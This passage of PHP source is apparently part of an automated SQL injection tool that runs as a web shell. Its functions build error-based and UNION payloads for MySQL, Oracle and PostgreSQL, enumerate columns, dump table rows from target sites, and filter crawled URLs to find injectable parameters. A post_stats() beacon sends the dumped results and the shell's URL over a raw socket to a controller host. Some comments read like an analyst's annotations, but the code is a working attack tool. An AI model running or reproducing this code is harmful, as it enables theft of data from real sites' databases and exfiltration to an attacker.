CHRize($table);$querys=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(*)%20AS%20CHARACTER(10000))%2C(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum>0%20AND%20a.relname%3D(".$table_chr.")%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))",$query);}$return['inj']=$inj;$return['sobras']=$sobras;$return['database']=$database;$return['table']=$table;if($mode=="mysql_error"){$query_n=str_replace("$payload_error",'(SELECT%205724%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(column_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D'.$table_hex.'%20AND%20table_schema%3D'.$database_hex.'%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype = "mysql_eb";}elseif($mode=="mysql_union"){$query_n=str_replace("$payload_union",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(column_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D'.$table_hex.'%20AND%20table_schema%3D'.$database_hex.'%20LIMIT%20$i,1)', $query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype = "mysql_ub";}elseif($mode=="oracle_error"){$query_n=str_replace("$payload_oracle",'(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COLUMN_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20COLUMN_NAME%2CDATA_TYPE%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D'.$table_chr.'%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))',$query);	$i = 
1;$count=(GetBetween(file_get_contents($inj.$querys.$sobras)));$ntype = "oracle_eb";}elseif($mode=="postgre_error"){$query_n=str_replace("$payload_postgre",'(SELECT%20COALESCE(CAST(attname%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum%3E0%20AND%20a.relname%3D('.$table_chr.')%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))%20OFFSET%20$i%20LIMIT%201)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);$ntype = "posgre_eb";}$return['cols_count']=$count;while ($i <= $count){$query_nombre=str_replace('$i',"$i",$query_n);$cols[] = GetBetween(file_get_contents($inj.$query_nombre.$sobras));$i++;}$return['index']=$index;$return['type']=$ntype;$return['cols']=$cols;$return['cols_hex']=$col_hex;}return $return;}
// dump(): retrieves rows $c_from..min($c_to,rows_total) of the listed $cols from $database.$table, one outbound request per column per row, joining the values of a row with ';'. Returns rows_total, rows_done and dump (list of row strings). $lba is incremented before first assignment, so the per-column arrays are 1-based.
function dump($type,$inj,$sobras,$index,$database,$table,$cols,$c_from,$c_to){global $unipl;$database_hex=hexEncode($database);$table_hex=hexEncode($table);$payload_union="CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)";$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = 
array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){if(is_array($cols)==true){foreach($cols as $col){if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1];				$querys=str_replace("$payload_error","(SELECT%207656%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20".$database.".".$table."),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("$payload_union","CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)",$query);$querys=str_replace("%23","%20FROM%20".$database.".".$table."%23",$querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];$querys=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20COUNT(".$col.")%20FROM%20".$database_hex.".".$table.")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];$querys=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(%2A)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.".$table.")",$query);}if($mode=="mysql_error"){$queryn=str_replace("$payload_error",'(SELECT%206968%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST('.$col.'%20AS%20CHAR),0x20)),1,50)%20FROM%20'.$database.'.'.$table.'%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)',$query);$i = 
0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}elseif($mode=="mysql_union"){$queryn=str_replace("$payload_union",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST('.$col.'%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20'.$database.'.'.$table.'%20LIMIT%20$i,1)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}elseif($mode=="oracle_error"){$queryn=str_replace("$payload_oracle",'(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST('.$col.'%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20'.$col.'%2CROWNUM%20AS%20LIMIT%20FROM%20'.$database_hex.'.'.$table.'%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}elseif($mode=="postgre_error"){$queryn=str_replace("$payload_postgre",'(SELECT%20COALESCE(CAST('.$col.'%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.'.$table.'%20OFFSET%20$i%20LIMIT%201)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}$lba++;$lba_name[$lba]=$col;$lba_count[$lba]=$count;$lba_queryn[$lba]=$queryn;}$rows_total=max($lba_count)+1;$return['rows_total']=$rows_total;$i=$c_from;if($c_to<$rows_total){$finish=$c_to;}else{$finish=$rows_total;}while ($i < $finish){$this_lba=0;$savedump='';while ($this_lba < $lba){$this_lba++;$query_nombre=str_replace('$i',"$i",$lba_queryn[$this_lba]);$nombre = GetBetween(file_get_contents($inj.$query_nombre.$sobras));$savedump.=$nombre.';';}$savedump=substr($savedump, 0, strlen($savedump)-1);$tosave[]=$savedump;$i++;}$return['rows_done']=$i;}}$return['dump']=$tosave;return $return;}
// hexEncode(): returns "0x" followed by the hex of each byte of $str (no zero-padding of single-digit bytes), or FALSE when $str is null.
function hexEncode($str){if(is_null($str)){return FALSE;}$hexStr = "";for($i=0;isset($str[$i]);$i++){$char = dechex(ord($str[$i]));$hexStr .= $char;}return "0x".$hexStr;}
// GetBetween(): returns the text between the first ":oyu:" and the following ":phz:" in $content, or '' when the opening marker is absent. These two markers are the response-side indicator of this tool's traffic.
function GetBetween($content){$r = explode(":oyu:", $content);if (isset($r[1])){$r = explode(":phz:", $r[1]);return $r[0];}return'';}
// string_sort(): usort() comparator ordering strings by byte length (strlen).
function string_sort($a, $b){if(strlen($a)>strlen($b)){return 1;}elseif(strlen($a)==strlen($b)){return 0;}else{return -1;}}
// optimus(): de-duplicates and thins the crawled URL list in two passes: strips fragments, keeps URLs whose last "=" value is non-numeric plus the first URL of each distinct prefix, sorts by length, and repeats the filter. Returns the natsort()ed result.
function optimus($urls){$urls=array_unique($urls);natsort($urls);foreach($urls as $url){$urlht=explode("#", $url);$url=$urlht[0];$urlex=explode("=", $url);foreach($urlex as $urlexpart){$urlend=$urlexpart;}$urlstart=substr($url, 0, strlen($url)-strlen($urlend));if(!is_numeric($urlend)){$urls_filt[]=$url;}if($urlstart!=$prev_urlstart){$urls_filt[]=$url;}$prev_urlstart=$urlstart;}$urls_filt=array_unique($urls_filt);natsort($urls_filt);usort($urls_filt, 'string_sort'); foreach($urls_filt as $url){$urlex=explode("=", $url);foreach($urlex as $urlexpart){$urlend=$urlexpart;}$urlstart=substr($url, 0, strlen($url)-strlen($urlend));if(!is_numeric($urlend)){$urls_filt2[]=$url;}if($urlstart!=$prev_urlstart){$urls_filt2[]=$url;}$prev_urlstart=$urlstart;}$urls_filt2=array_unique($urls_filt2);natsort($urls_filt2);return $urls_filt2;}
// post_stats(): the beacon. Packs type/code/id plus base64(serialize()) of $opt and $nfo and this shell's own URL (sh=) into one string. If the eh cookie is truthy the string is echoed into the HTTP response; otherwise a raw TCP socket is opened to the host[:port] from the sd cookie (port 80 when absent, receive timeout from st) and the string is sent as the Cookie header of "GET http://<sd>/post.php". Connection failures are silently ignored.
function post_stats($type,$code,$id,$opt,$nfo){global $st, $sd, $eh;$host=explode("/", $sd);$hp=explode(":", $host[0]);if(empty($hp[1])){$hp[1]='80';}$data='tp='.$type.';cd='.$code.';id='.urlencode($id).';op='.urlencode(base64_encode(serialize($opt))).';nf='.urlencode(base64_encode(serialize($nfo))).';sh='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']).';';if($eh){echo $data;}else{$socket = socket_create(AF_INET,SOCK_STREAM,0);socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => $st, "usec" => 0));if (!socket_connect($socket, $hp[0], $hp[1])){socket_close($socket);}else{socket_write($socket, "GET http://".$sd."/post.php HTTP/1.1\r\nHost: ".$host[0]."\r\nCookie: ".$data."\r\n\r\n");socket_close($socket);}}}?>